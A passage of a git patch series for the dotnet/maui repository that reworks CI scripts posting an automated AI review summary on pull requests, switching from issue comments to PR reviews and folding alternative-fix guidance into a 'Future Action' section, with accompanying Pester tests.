'Post AI summary review with deep test results' # Job-level variables can use $[ stageDependencies... ] (cross-stage, # job context). The stage condition above already gated emptiness; - # this just makes the value available as $(aiSummaryCommentId) + # this just makes the value available as $(aiSummaryReviewId) # inside the steps. variables: - aiSummaryCommentId: $[ stageDependencies.ReviewPR.CopilotReview.outputs['RunPost.aiSummaryCommentId'] ] + aiSummaryReviewId: $[ stageDependencies.ReviewPR.CopilotReview.outputs['RunPost.aiSummaryReviewId'] ] pool: name: Azure Pipelines vmImage: ubuntu-22.04 @@ -1360,12 +1360,12 @@ stages: $artDir = "$(Pipeline.Workspace)/drop-deep-uitests" $copilotLogsDir = "$(Pipeline.Workspace)/CopilotLogs" $prNumber = "${{ parameters.PRNumber }}" - $commentId = "$(aiSummaryCommentId)" - $isDeferred = ($commentId -eq 'DEFERRED') + $reviewId = "$(aiSummaryReviewId)" + $isDeferred = ([string]::IsNullOrWhiteSpace($reviewId) -or $reviewId -eq 'DEFERRED') # Diagnostic logging for Stage 3 debugging Write-Host "=== Stage 3 Diagnostics ===" -ForegroundColor Cyan - Write-Host " commentId: '$commentId'" + Write-Host " reviewId: '$reviewId'" Write-Host " isDeferred: $isDeferred" Write-Host " artDir exists: $(Test-Path $artDir)" Write-Host " copilotLogsDir exists: $(Test-Path $copilotLogsDir)" @@ -1377,16 +1377,16 @@ stages: } } - if ([string]::IsNullOrWhiteSpace($commentId)) { - # Reviewer crashed before posting the initial comment. If deep + if ([string]::IsNullOrWhiteSpace($reviewId)) { + # Reviewer crashed before posting the initial review. If deep # tests produced results, fall back to DEFERRED mode to post - # a degraded comment with test results only. + # a degraded review with test results only. if (Test-Path $artDir) { - Write-Host "No AI summary comment ID but deep test artifacts exist — falling back to DEFERRED mode" - $commentId = 'DEFERRED' + Write-Host "No AI summary review ID but deep test artifacts exist — falling back to DEFERRED mode" + $reviewId = 'DEFERRED' $isDeferred = $true } else { - Write-Host "No AI summary comment ID and no deep test artifacts — nothing to do" + Write-Host "No AI summary review ID and no deep test artifacts — nothing to do" exit 0 } } @@ -1584,13 +1584,13 @@ stages: if ($isDeferred) { # Keep deferred mode even if a prior AI Summary exists. The - # posting script preserves existing sessions, deletes stale - # generated comments, then posts a fresh unified comment. - Write-Host "Deferred AI Summary posting will clean up any stale generated comments before posting" + # posting script preserves current-run artifacts, hides stale + # generated comments/reviews, then posts a fresh summary review. + Write-Host "Deferred AI Summary posting will hide stale generated artifacts before posting" } if ($isDeferred) { - # ── DEFERRED MODE (first run): Post full comment ── + # ── DEFERRED MODE (first run): Post full review ── # Find the PRAgent content dir from CopilotLogs artifact $prAgentDir = Get-ChildItem -Path $copilotLogsDir -Recurse -Directory -Filter "PRAgent" | Select-Object -First 1 if (-not $prAgentDir) { @@ -1623,7 +1623,7 @@ stages: Write-Host "Replaced in-process results with deep results" } } else { - Write-Host "No deep results — posting review-only comment" + Write-Host "No deep results — posting review-only summary" } # Copy PRAgent dir to expected location for post-ai-summary-comment.ps1 @@ -1631,13 +1631,13 @@ stages: New-Item -ItemType Directory -Force -Path (Split-Path -Parent $targetDir) | Out-Null Copy-Item -Path $prAgentDir.FullName -Destination $targetDir -Recurse -Force - # Post the full comment + # Post the full review $postScript = ".github/scripts/post-ai-summary-comment.ps1" if (Test-Path $postScript) { - Write-Host "Posting full AI summary comment with deep results..." + Write-Host "Posting full AI summary review with deep results..." $output = & $postScript -PRNumber $prNumber $output | ForEach-Object { Write-Host $_ } - Write-Host "✅ Full AI summary comment posted with deep results" + Write-Host "✅ Full AI summary review posted with deep results" } # Apply labels @@ -1653,14 +1653,14 @@ stages: } } } else { - # ── PATCH MODE: Update existing comment with deep results ── + # ── PATCH MODE: Update existing review with deep results ── if (-not $deepBlock) { - Write-Host "No deep results and comment already exists — nothing to patch" + Write-Host "No deep results and review already exists — nothing to patch" exit 0 } - $existing = (gh api "repos/dotnet/maui/issues/comments/$commentId" --jq '.body') -join [Environment]::NewLine + $existing = (gh api "repos/dotnet/maui/pulls/$prNumber/reviews/$reviewId" --jq '.body') -join [Environment]::NewLine if ([string]::IsNullOrWhiteSpace($existing)) { - Write-Host "Could not fetch comment body — aborting" + Write-Host "Could not fetch review body — aborting" exit 0 } @@ -1686,9 +1686,9 @@ stages: $tmp = New-TemporaryFile @{ body = $newBody } | ConvertTo-Json -Depth 4 -Compress | Set-Content $tmp -Encoding UTF8 - gh api -X PATCH "repos/dotnet/maui/issues/comments/$commentId" --input $tmp.FullName | Out-Null - Write-Host "✅ Patched comment $commentId with deep UI test results ($totalPassed/$($totalPassed + $totalFailed))" + gh api -X PATCH "repos/dotnet/maui/pulls/$prNumber/reviews/$reviewId" --input $tmp.FullName | Out-Null + Write-Host "✅ Patched review $reviewId with deep UI test results ($totalPassed/$($totalPassed + $totalFailed))" } - displayName: 'Post AI summary comment' + displayName: 'Post AI summary review' env: GH_TOKEN: $(GH_COMMENT_TOKEN) From d461a5b1f23f89533a7c35346d2704ca8f05d6fa Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: Sun, 31 May 2026 14:48:22 +0200 Subject: [PATCH 19/34] Update MauiBot AI summary layout Use the unified AI Review Summary layout with segmented status chips, collapsed review sessions, and a Future Action section for alternative fix guidance. Avoid posting a separate try-fix review so the AI summary is the single source of truth. Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .github/scripts/Review-PR.ps1 | 86 +---- .github/scripts/post-ai-summary-comment.ps1 | 329 ++++++++++++++++++-- 2 files changed, 309 insertions(+), 106 deletions(-) diff --git a/.github/scripts/Review-PR.ps1 b/.github/scripts/Review-PR.ps1 index f1da6706ae02..575dff836e2b 100644 --- a/.github/scripts/Review-PR.ps1 +++ b/.github/scripts/Review-PR.ps1 @@ -1774,88 +1774,10 @@ if ($isPRWinner) { } } } else { - # Non-PR candidate won — submit a REQUEST_CHANGES review with the candidate diff in the body - Write-Host " 📝 Non-PR candidate won — submitting REQUEST_CHANGES review with candidate diff..." -ForegroundColor Cyan - - $maxDiffBytes = 55KB - $diff = [string]$winner.candidateDiff - $truncated = $false - # Truncate by binary-searching the largest character count whose UTF-8 - # encoding fits within the byte budget (reserving room for the marker line). - # O(log n) and much cheaper than the previous O(n²) trim-512-and-recount loop. - $marker = "`n... [truncated]" - $markerBytes = [System.Text.Encoding]::UTF8.GetByteCount($marker) - $budget = $maxDiffBytes - $markerBytes - if ([System.Text.Encoding]::UTF8.GetByteCount($diff) -gt $maxDiffBytes) { - $lo = 0 - $hi = $diff.Length - while ($lo -lt $hi) { - $mid = [int](($lo + $hi + 1) / 2) - $bytes = [System.Text.Encoding]::UTF8.GetByteCount($diff.Substring(0, $mid)) - if ($bytes -le $budget) { $lo = $mid } else { $hi = $mid - 1 } - } - $diff = $diff.Substring(0, $lo) + $marker - $truncated = $true - } - - # Compute an outer code fence longer than any backtick run inside the diff - # (minimum 4) so the diff content cannot accidentally close the fence and - # leak into the surrounding markdown. Preserves the diff text exactly. - $maxBacktickRun = 0 - foreach ($m in [regex]::Matches($diff, '`+')) { - if ($m.Length -gt $maxBacktickRun) { $maxBacktickRun = $m.Length } - } - $fenceLen = [Math]::Max(4, $maxBacktickRun + 1) - $fence = '`' * $fenceLen - - $rationale = if ($winner.summary) { [string]$winner.summary } else { "Automated review identified a stronger candidate fix." } - $reviewBody = @" - -🤖 **Automated review — alternative fix proposed** - -The expert-reviewer evaluation compared the PR fix against $($winner.winner -replace 'try-fix-','#') automatically generated candidates and selected ``$($winner.winner)`` as the strongest fix. - -**Why:** $rationale - -Please consider applying the candidate diff below (or use it as guidance). Once you push an update, this workflow will re-trigger and re-evaluate. - -
Candidate diff (``$($winner.winner)``) - -${fence}diff -$diff -$fence - -
-$( if ($truncated) { "`n_The diff was truncated to fit GitHub's review body limit._" } ) -"@ - - if ($DryRun) { - Write-Host " [DryRun] Would POST review state=REQUEST_CHANGES with body length $($reviewBody.Length)" -ForegroundColor Yellow - } else { - try { - $bodyJson = @{ body = $reviewBody; event = 'REQUEST_CHANGES' } | ConvertTo-Json -Compress -Depth 5 - $tmp = New-TemporaryFile - Set-Content -LiteralPath $tmp -Value $bodyJson -Encoding utf8 -NoNewline - $resp = & gh api -X POST "repos/dotnet/maui/pulls/$PRNumber/reviews" --input $tmp 2>&1 - Remove-Item -LiteralPath $tmp -Force -ErrorAction SilentlyContinue - if ($LASTEXITCODE -eq 0) { - $tryFixReview = (($resp -join [Environment]::NewLine) | ConvertFrom-Json) - $tryFixDir = Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent" - New-Item -ItemType Directory -Force -Path $tryFixDir | Out-Null - if ($tryFixReview.id) { - [string]$tryFixReview.id | Set-Content (Join-Path $tryFixDir "try-fix-review-id.txt") -Encoding UTF8 - } - if ($tryFixReview.node_id) { - [string]$tryFixReview.node_id | Set-Content (Join-Path $tryFixDir "try-fix-review-node-id.txt") -Encoding UTF8 - } - Write-Host " ✅ REQUEST_CHANGES review submitted" -ForegroundColor Green - } else { - Write-Host " ⚠️ Failed to submit REQUEST_CHANGES review (non-fatal): $resp" -ForegroundColor Yellow - } - } catch { - Write-Host " ⚠️ REQUEST_CHANGES submission threw (non-fatal): $_" -ForegroundColor Yellow - } - } + # Non-PR candidate details are now merged into the unified AI Summary + # Future Action section. Avoid a second MauiBot review so the PR has one + # source of truth for automated review guidance. + Write-Host " ⏭️ Non-PR candidate selected; Future Action is included in AI Summary" -ForegroundColor Cyan Write-Host " ⏭️ Skipping inline findings (winner is not the PR fix)" -ForegroundColor Gray } diff --git a/.github/scripts/post-ai-summary-comment.ps1 b/.github/scripts/post-ai-summary-comment.ps1 index 2add8afa6c8e..444288e49895 100644 --- a/.github/scripts/post-ai-summary-comment.ps1 +++ b/.github/scripts/post-ai-summary-comment.ps1 @@ -58,11 +58,11 @@ if (Test-Path $commentCleanupScript) { Write-Host "ℹ️ Loading phase content for PR #$PRNumber..." -ForegroundColor Cyan +$RepoRoot = git rev-parse --show-toplevel 2>$null $PRAgentDir = "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent" if (-not (Test-Path $PRAgentDir)) { - $repoRoot = git rev-parse --show-toplevel 2>$null - if ($repoRoot) { - $PRAgentDir = Join-Path $repoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent" + if ($RepoRoot) { + $PRAgentDir = Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent" } } @@ -71,12 +71,12 @@ if (-not (Test-Path $PRAgentDir)) { } $phases = [ordered]@{ - "uitests" = @{ File = "uitests/content.md"; Icon = "🧪"; Title = "UI Tests" } - "regression-check" = @{ File = "regression-check/content.md"; Icon = "🔍"; Title = "Regression Cross-Reference" } - "pre-flight" = @{ File = "pre-flight/content.md"; Icon = "🔍"; Title = "Pre-Flight — Context & Validation" } - "code-review" = @{ File = "pre-flight/code-review.md"; Icon = "🔬"; Title = "Code Review — Deep Analysis" } - "try-fix" = @{ File = "try-fix/content.md"; Icon = "🔧"; Title = "Fix — Analysis & Comparison" } - "report" = @{ File = "report/content.md"; Icon = "📋"; Title = "Report — Final Recommendation" } + "uitests" = @{ File = "uitests/content.md"; Title = "UI Tests" } + "regression-check" = @{ File = "regression-check/content.md"; Title = "Regression Cross-Reference" } + "pre-flight" = @{ File = "pre-flight/content.md"; Title = "Pre-Flight — Context & Validation" } + "code-review" = @{ File = "pre-flight/code-review.md"; Title = "Code Review — Deep Analysis" } + "try-fix" = @{ File = "try-fix/content.md"; Title = "Fix — Analysis & Comparison" } + "report" = @{ File = "report/content.md"; Title = "Report — Final Recommendation" } } function Test-PhaseContentIsNoOp { @@ -126,6 +126,270 @@ function Get-AIReviewEvent { return 'COMMENT' } +function ConvertTo-TitleCase { + param([string]$Value) + + if ([string]::IsNullOrWhiteSpace($Value)) { + return $Value + } + + $trimmed = $Value.Trim() + switch -Regex ($trimmed) { + '(?i)^android$' { return 'Android' } + '(?i)^ios$' { return 'iOS' } + '(?i)^maccatalyst$' { return 'MacCatalyst' } + '(?i)^windows$' { return 'Windows' } + '(?i)^all$' { return 'All' } + } + + return (Get-Culture).TextInfo.ToTitleCase($trimmed.ToLowerInvariant()) +} + +function ConvertTo-ShieldsSegment { + param([string]$Value) + + $encoded = [uri]::EscapeDataString($Value) + return ($encoded -replace '-', '--' -replace '_', '__') +} + +function New-StatusChip { + param( + [Parameter(Mandatory = $true)][string]$Label, + [Parameter(Mandatory = $true)][string]$Value, + [Parameter(Mandatory = $true)][string]$Color + ) + + $labelSegment = ConvertTo-ShieldsSegment $Label + $valueSegment = ConvertTo-ShieldsSegment $Value + $alt = "$Label $Value" -replace '"', '"' + return " `"$alt`"" +} + +function Get-GateStatus { + param([string]$GateContent) + + if ([string]::IsNullOrWhiteSpace($GateContent)) { + return 'Unknown' + } + + if ($GateContent -match '(?im)Gate Result:\s*(?:\S+\s*)?(FAILED|PASSED|SKIPPED)') { + return ConvertTo-TitleCase $Matches[1] + } + + if ($GateContent -match '(?i)\bfailed\b') { return 'Failed' } + if ($GateContent -match '(?i)\bpassed\b') { return 'Passed' } + if ($GateContent -match '(?i)\bskipped\b') { return 'Skipped' } + return 'Unknown' +} + +function Get-ConfidenceStatus { + param([string[]]$Contents) + + foreach ($content in $Contents) { + if ([string]::IsNullOrWhiteSpace($content)) { + continue + } + + if ($content -match '(?im)\*\*Confidence:\*\*\s*(high|medium|low|unknown)') { + return ConvertTo-TitleCase $Matches[1] + } + if ($content -match '(?im)^Confidence:\s*(high|medium|low|unknown)') { + return ConvertTo-TitleCase $Matches[1] + } + } + + return 'Unknown' +} + +function Get-PlatformStatus { + param([string[]]$Contents) + + foreach ($content in $Contents) { + if ([string]::IsNullOrWhiteSpace($content)) { + continue + } + + if ($content -match '(?im)\*\*Platform:\*\*\s*([A-Za-z, /]+)') { + return ConvertTo-TitleCase (($Matches[1] -split '[,/]')[0]) + } + if ($content -match '(?im)\*\*Platforms Affected:\*\*\s*([A-Za-z, /]+)') { + return ConvertTo-TitleCase (($Matches[1] -split '[,/]')[0]) + } + } + + return 'Unknown' +} + +function New-StatusChipRow { + param( + [string]$GateStatus, + [string]$ReviewStatus, + [string]$Confidence, + [string]$Platform + ) + + $gateColor = switch ($GateStatus) { + 'Passed' { '1a7f37' } + 'Skipped' { 'bf8700' } + default { 'd1242f' } + } + $reviewColor = switch ($ReviewStatus) { + 'LGTM' { '1a7f37' } + 'Approved' { '1a7f37' } + 'Needs Changes' { 'd1242f' } + default { '0969da' } + } + $confidenceColor = switch ($Confidence) { + 'High' { '0969da' } + 'Medium' { 'bf8700' } + 'Low' { 'd1242f' } + default { '57606a' } + } + $platformColor = if ($Platform -eq 'Unknown') { '57606a' } else { '8250df' } + + $chips = @( + (New-StatusChip -Label 'Gate' -Value $GateStatus -Color $gateColor), + (New-StatusChip -Label 'Code Review' -Value $ReviewStatus -Color $reviewColor), + (New-StatusChip -Label 'Confidence' -Value $Confidence -Color $confidenceColor), + (New-StatusChip -Label 'Platform' -Value $Platform -Color $platformColor) + ) + + return @" +

+$($chips -join "`n") +

+"@ +} + +function New-FutureActionSection { + param( + [Parameter(Mandatory = $true)][string]$PRAgentDir + ) + + $winnerFile = Join-Path $PRAgentDir "winner.json" + if (-not (Test-Path $winnerFile)) { + return @" +--- + +
+Future Action — review latest findings +
+ +No alternative fix was selected for this run. Review the session findings and CI results before merging. + +
+"@ + } + + try { + $winner = Get-Content -Raw -LiteralPath $winnerFile -Encoding UTF8 | ConvertFrom-Json + } catch { + return @" +--- + +
+Future Action — review latest findings +
+ +The workflow could not parse the fix-selection result. Review the session findings and CI results before merging. + +
+"@ + } + + if ($winner.isPRFix -eq $true -or [string]::IsNullOrWhiteSpace([string]$winner.winner)) { + return @" +--- + +
+Future Action — review latest findings +
+ +No alternative fix was selected for this run. Review the session findings and CI results before merging. + +
+"@ + } + + $selected = [string]$winner.winner + $rationale = if ($winner.summary) { [string]$winner.summary } else { "Automated review identified a stronger candidate fix." } + $diff = [string]$winner.candidateDiff + $truncated = $false + + if ([string]::IsNullOrWhiteSpace($diff)) { + $diff = "Candidate diff was not available in winner.json." + } else { + $maxDiffBytes = 55KB + $marker = "`n... [truncated]" + $markerBytes = [System.Text.Encoding]::UTF8.GetByteCount($marker) + $budget = $maxDiffBytes - $markerBytes + if ([System.Text.Encoding]::UTF8.GetByteCount($diff) -gt $maxDiffBytes) { + $lo = 0 + $hi = $diff.Length + while ($lo -lt $hi) { + $mid = [int](($lo + $hi + 1) / 2) + $bytes = [System.Text.Encoding]::UTF8.GetByteCount($diff.Substring(0, $mid)) + if ($bytes -le $budget) { $lo = $mid } else { $hi = $mid - 1 } + } + $diff = $diff.Substring(0, $lo) + $marker + $truncated = $true + } + } + + $maxBacktickRun = 0 + foreach ($m in [regex]::Matches($diff, '`+')) { + if ($m.Length -gt $maxBacktickRun) { $maxBacktickRun = $m.Length } + } + $fenceLen = [Math]::Max(4, $maxBacktickRun + 1) + $fence = '`' * $fenceLen + $truncatedNote = if ($truncated) { "`n_The diff was truncated to fit GitHub's review body limit._" } else { "" } + + return @" +--- + +
+Future Action — alternative fix proposed ($selected) +
+ +**Automated review — alternative fix proposed** + +The expert-reviewer evaluation compared the PR fix against automatically generated candidates and selected $selected as the strongest fix. + +**Why:** $rationale + +Please consider applying the candidate diff below (or use it as guidance). Once you push an update, this workflow will re-trigger and re-evaluate. + +
Candidate diff ($selected) + +${fence}diff +$diff +$fence + +
+$truncatedNote + +
+"@ +} + +function Test-HasNonPRWinner { + param( + [Parameter(Mandatory = $true)][string]$PRAgentDir + ) + + $winnerFile = Join-Path $PRAgentDir "winner.json" + if (-not (Test-Path $winnerFile)) { + return $false + } + + try { + $winner = Get-Content -Raw -LiteralPath $winnerFile -Encoding UTF8 | ConvertFrom-Json + return ($winner.isPRFix -eq $false -and -not [string]::IsNullOrWhiteSpace([string]$winner.winner)) + } catch { + return $false + } +} + function Get-PreservedMauiBotNodeIds { param([Parameter(Mandatory = $true)][string]$PRAgentDir) @@ -183,16 +447,17 @@ function Invoke-PostPullRequestReview { } } -# ─── Gate content (rendered first, always open) ─── +# ─── Gate content (rendered first, collapsed) ─── $gateSection = $null +$gateContent = $null $gateFilePath = Join-Path $PRAgentDir "gate/content.md" if (Test-Path $gateFilePath) { $gateContent = Get-Content $gateFilePath -Raw -Encoding UTF8 if (-not [string]::IsNullOrWhiteSpace($gateContent)) { Write-Host " ✅ gate ($((Get-Item $gateFilePath).Length) bytes)" -ForegroundColor Green $gateSection = @" -
-🚦 Gate — Test Before & After Fix +
+Gate — Test Before & After Fix
$gateContent @@ -224,11 +489,11 @@ foreach ($key in $phases.Keys) { $phaseContentByKey[$key] = $content Write-Host " ✅ $key ($((Get-Item $filePath).Length) bytes)" -ForegroundColor Green # For uitests, make title dynamic: "UI Tests — Cat1, Cat2" - $phaseTitle = "$($phase.Icon) $($phase.Title)" + $phaseTitle = $phase.Title if ($key -eq "uitests") { $catMatch = [regex]::Match($content, 'Detected UI test categories:\*\*\s*`{1,2}([^`]+)`{1,2}') if ($catMatch.Success) { - $phaseTitle = "$($phase.Icon) $($phase.Title) — $($catMatch.Groups[1].Value)" + $phaseTitle = "$($phase.Title) — $($catMatch.Groups[1].Value)" } } $phaseSections += @" @@ -253,6 +518,9 @@ if (-not $gateSection -and $phaseSections.Count -eq 0) { } $reviewEvent = Get-AIReviewEvent -ReportContent $phaseContentByKey['report'] +if ((Test-HasNonPRWinner -PRAgentDir $PRAgentDir) -and $reviewEvent -eq 'COMMENT') { + $reviewEvent = 'REQUEST_CHANGES' +} Write-Host " 🧾 PR review event: $reviewEvent" -ForegroundColor Cyan # ============================================================================ @@ -281,7 +549,7 @@ $timestamp = (Get-Date).ToUniversalTime().ToString("yyyy-MM-dd HH:mm UTC") # BUILD NEW SESSION BLOCK # ============================================================================ -# Combine gate (always first, open) with phases (collapsed). When only one +# Combine gate (always first) with phases (collapsed). When only one # kind of content is available, the session still renders cleanly. $sessionParts = @() if ($gateSection) { $sessionParts += $gateSection } @@ -291,18 +559,14 @@ $phaseContent = $sessionParts -join "`n`n---`n`n" $sessionMarkerStart = "" $sessionMarkerEnd = "" -# The latest session is built with
; when merged into existing -# sessions the script re-tags only the newest as "open". $newSessionBlock = @" $sessionMarkerStart -
-📊 Review Session$commitSha7 · $commitTitle · $timestamp +
+Review Sessions — click to expand
$phaseContent ---- -
$sessionMarkerEnd "@ @@ -342,9 +606,22 @@ if ($existingRaw) { $authorPing = "" if ($prAuthor) { - $authorPing = "> 👋 @$prAuthor — new AI review results are available. Please review the latest session below." + $authorPing = "> @$prAuthor — new AI review results are available based on this last commit: $commitSha7.`n> **$commitTitle**" } +$reviewStatus = switch ($reviewEvent) { + 'APPROVE' { 'LGTM' } + 'REQUEST_CHANGES' { 'Needs Changes' } + default { 'In Review' } +} +$summaryContent = @($gateContent) + @($phaseContentByKey.Values) +$statusChipRow = New-StatusChipRow ` + -GateStatus (Get-GateStatus -GateContent $gateContent) ` + -ReviewStatus $reviewStatus ` + -Confidence (Get-ConfidenceStatus -Contents $summaryContent) ` + -Platform (Get-PlatformStatus -Contents $summaryContent) +$futureActionSection = New-FutureActionSection -PRAgentDir $PRAgentDir + $finalizeSection = "" $finalizePattern = '(?s)(.*?)' if ($existingBodies -and $existingBodies.Count -gt 0) { @@ -359,11 +636,15 @@ if ($existingBodies -and $existingBodies.Count -gt 0) { $commentBody = @" $MARKER -## 🤖 AI Summary +## AI Review Summary $authorPing -$newSessionBlock$finalizeSection +$statusChipRow + +$newSessionBlock + +$futureActionSection$finalizeSection "@ # Clean up excessive blank lines From 8fcd355bb854cfed34357ba09d563baa79d3cb0d Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: Sun, 31 May 2026 14:56:09 +0200 Subject: [PATCH 20/34] Merge try-fix guidance into AI summary review Keep AI Summary as the single current MauiBot review artifact, ensure non-PR try-fix winners request changes through that review, and prevent stale try-fix cleanup from hiding the merged summary. Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .../scripts/Post-AISummaryComment.Tests.ps1 | 86 ++++++++++++++++++- .../Remove-StaleMauiBotComments.Tests.ps1 | 18 ++++ .github/scripts/post-ai-summary-comment.ps1 | 38 +++----- .../shared/Remove-StaleMauiBotComments.ps1 | 4 + 4 files changed, 117 insertions(+), 29 deletions(-) diff --git a/.github/scripts/Post-AISummaryComment.Tests.ps1 b/.github/scripts/Post-AISummaryComment.Tests.ps1 index b02a84fda302..ee0d3767ba62 100644 --- a/.github/scripts/Post-AISummaryComment.Tests.ps1 +++ b/.github/scripts/Post-AISummaryComment.Tests.ps1 @@ -17,7 +17,13 @@ BeforeAll { throw ($parseErrors | ForEach-Object { $_.Message }) -join [Environment]::NewLine } - foreach ($functionName in @('Test-PhaseContentIsNoOp', 'Get-AIReviewEvent')) { + foreach ($functionName in @( + 'Test-PhaseContentIsNoOp', + 'Get-AIReviewEvent', + 'Test-HasNonPRWinner', + 'Get-AIReviewEventForRun', + 'New-FutureActionSection' + )) { $function = $ast.Find({ $args[0] -is [System.Management.Automation.Language.FunctionDefinitionAst] -and $args[0].Name -eq $functionName @@ -92,3 +98,81 @@ Describe 'Get-AIReviewEvent' { Get-AIReviewEvent -ReportContent 'Recommendation: APPROVE after manual review' | Should -Be 'COMMENT' } } + +Describe 'Get-AIReviewEventForRun' { + BeforeEach { + $script:testDir = Join-Path ([System.IO.Path]::GetTempPath()) "ai-summary-tests-$([guid]::NewGuid())" + New-Item -ItemType Directory -Path $script:testDir -Force | Out-Null + } + + AfterEach { + Remove-Item -LiteralPath $script:testDir -Recurse -Force -ErrorAction SilentlyContinue + } + + It 'requests changes when a non-PR try-fix candidate wins and the report is otherwise comment-only' { + @{ + winner = 'try-fix-1' + isPRFix = $false + candidateDiff = 'diff --git a/file.cs b/file.cs' + summary = 'Candidate fixes the issue more directly.' + } | ConvertTo-Json -Depth 5 | Set-Content (Join-Path $script:testDir 'winner.json') -Encoding UTF8 + + Get-AIReviewEventForRun -ReportContent 'Report still in progress.' -PRAgentDir $script:testDir | + Should -Be 'REQUEST_CHANGES' + } + + It 'does not override an exact approve recommendation' { + @{ + winner = 'try-fix-1' + isPRFix = $false + candidateDiff = 'diff --git a/file.cs b/file.cs' + } | ConvertTo-Json -Depth 5 | Set-Content (Join-Path $script:testDir 'winner.json') -Encoding UTF8 + + Get-AIReviewEventForRun -ReportContent 'Final Recommendation: APPROVE' -PRAgentDir $script:testDir | + Should -Be 'APPROVE' + } + + It 'does not force changes for missing, malformed, or PR-fix winner files' { + Get-AIReviewEventForRun -ReportContent '' -PRAgentDir $script:testDir | + Should -Be 'COMMENT' + + 'not json' | Set-Content (Join-Path $script:testDir 'winner.json') -Encoding UTF8 + Get-AIReviewEventForRun -ReportContent '' -PRAgentDir $script:testDir | + Should -Be 'COMMENT' + + @{ + winner = 'pr' + isPRFix = $true + } | ConvertTo-Json -Depth 5 | Set-Content (Join-Path $script:testDir 'winner.json') -Encoding UTF8 + Get-AIReviewEventForRun -ReportContent '' -PRAgentDir $script:testDir | + Should -Be 'COMMENT' + } +} + +Describe 'New-FutureActionSection' { + BeforeEach { + $script:testDir = Join-Path ([System.IO.Path]::GetTempPath()) "future-action-tests-$([guid]::NewGuid())" + New-Item -ItemType Directory -Path $script:testDir -Force | Out-Null + } + + AfterEach { + Remove-Item -LiteralPath $script:testDir -Recurse -Force -ErrorAction SilentlyContinue + } + + It 'renders selected try-fix candidate guidance in the AI Summary Future Action section' { + @{ + winner = 'try-fix-2' + isPRFix = $false + summary = 'Candidate avoids the regression.' + candidateDiff = "diff --git a/file.cs b/file.cs`n+fixed" + } | ConvertTo-Json -Depth 5 | Set-Content (Join-Path $script:testDir 'winner.json') -Encoding UTF8 + + $section = New-FutureActionSection -PRAgentDir $script:testDir + + $section | Should -Match 'Future Action' + $section | Should -Match 'alternative fix proposed' + $section | Should -Match 'try-fix-2' + $section | Should -Match 'Candidate avoids the regression' + $section | Should -Match 'diff --git a/file.cs b/file.cs' + } +} diff --git a/.github/scripts/Remove-StaleMauiBotComments.Tests.ps1 b/.github/scripts/Remove-StaleMauiBotComments.Tests.ps1 index 21c43a0813ed..d46d4e13109e 100644 --- a/.github/scripts/Remove-StaleMauiBotComments.Tests.ps1 +++ b/.github/scripts/Remove-StaleMauiBotComments.Tests.ps1 @@ -30,6 +30,24 @@ Describe 'MauiBot artifact marker detection' { Test-IsTryFixCommentBody -Body 'Automated review — alternative fix proposed' | Should -BeTrue } + + It 'does not treat the merged AI Summary Future Action section as a standalone try-fix artifact' { + $body = @' + + +
+Future Action — alternative fix proposed (try-fix-1) + +**Automated review — alternative fix proposed** + +
Candidate diff (try-fix-1) +
+
+'@ + + Test-IsTryFixCommentBody -Body $body | + Should -BeFalse + } } Describe 'Test-ShouldPreserveMauiBotArtifact' { diff --git a/.github/scripts/post-ai-summary-comment.ps1 b/.github/scripts/post-ai-summary-comment.ps1 index 444288e49895..1caa3190d53a 100644 --- a/.github/scripts/post-ai-summary-comment.ps1 +++ b/.github/scripts/post-ai-summary-comment.ps1 @@ -390,31 +390,20 @@ function Test-HasNonPRWinner { } } -function Get-PreservedMauiBotNodeIds { - param([Parameter(Mandatory = $true)][string]$PRAgentDir) +function Get-AIReviewEventForRun { + param( + [string]$ReportContent, - $files = @( - 'try-fix-review-node-id.txt', - 'ai-summary-review-node-id.txt', - 'current-review-node-ids.txt' + [Parameter(Mandatory = $true)] + [string]$PRAgentDir ) - $nodeIds = @() - foreach ($file in $files) { - $path = Join-Path $PRAgentDir $file - if (-not (Test-Path $path)) { - continue - } - - $nodeIds += Get-Content $path -Encoding UTF8 | ForEach-Object { - $value = [string]$_ - if (-not [string]::IsNullOrWhiteSpace($value)) { - $value.Trim() - } - } + $reviewEvent = Get-AIReviewEvent -ReportContent $ReportContent + if ((Test-HasNonPRWinner -PRAgentDir $PRAgentDir) -and $reviewEvent -eq 'COMMENT') { + return 'REQUEST_CHANGES' } - return @($nodeIds | Where-Object { -not [string]::IsNullOrWhiteSpace($_) } | Select-Object -Unique) + return $reviewEvent } function Invoke-PostPullRequestReview { @@ -517,10 +506,7 @@ if (-not $gateSection -and $phaseSections.Count -eq 0) { throw "No gate or phase content found. Ensure at least one of gate/content.md or {phase}/content.md exists in $PRAgentDir." } -$reviewEvent = Get-AIReviewEvent -ReportContent $phaseContentByKey['report'] -if ((Test-HasNonPRWinner -PRAgentDir $PRAgentDir) -and $reviewEvent -eq 'COMMENT') { - $reviewEvent = 'REQUEST_CHANGES' -} +$reviewEvent = Get-AIReviewEventForRun -ReportContent $phaseContentByKey['report'] -PRAgentDir $PRAgentDir Write-Host " 🧾 PR review event: $reviewEvent" -ForegroundColor Cyan # ============================================================================ @@ -669,8 +655,6 @@ if ($DryRun) { # HIDE STALE GENERATED ARTIFACTS, THEN POST REVIEW # ============================================================================ -$preserveNodeIds = Get-PreservedMauiBotNodeIds -PRAgentDir $PRAgentDir - if (Get-Command Hide-StaleMauiBotIssueComments -ErrorAction SilentlyContinue) { Hide-StaleMauiBotIssueComments ` -PRNumber $PRNumber ` @@ -678,7 +662,6 @@ if (Get-Command Hide-StaleMauiBotIssueComments -ErrorAction SilentlyContinue) { -IncludeLegacyGate ` -IncludeMergeConflict ` -IncludeTryFix ` - -PreserveNodeIds $preserveNodeIds ` -Reason "stale generated PR review artifact" } @@ -687,7 +670,6 @@ if (Get-Command Hide-StaleMauiBotPullRequestReviews -ErrorAction SilentlyContinu -PRNumber $PRNumber ` -IncludeAISummary ` -IncludeTryFix ` - -PreserveNodeIds $preserveNodeIds ` -Reason "stale generated PR review" ` -DismissFormalReviews } diff --git a/.github/scripts/shared/Remove-StaleMauiBotComments.ps1 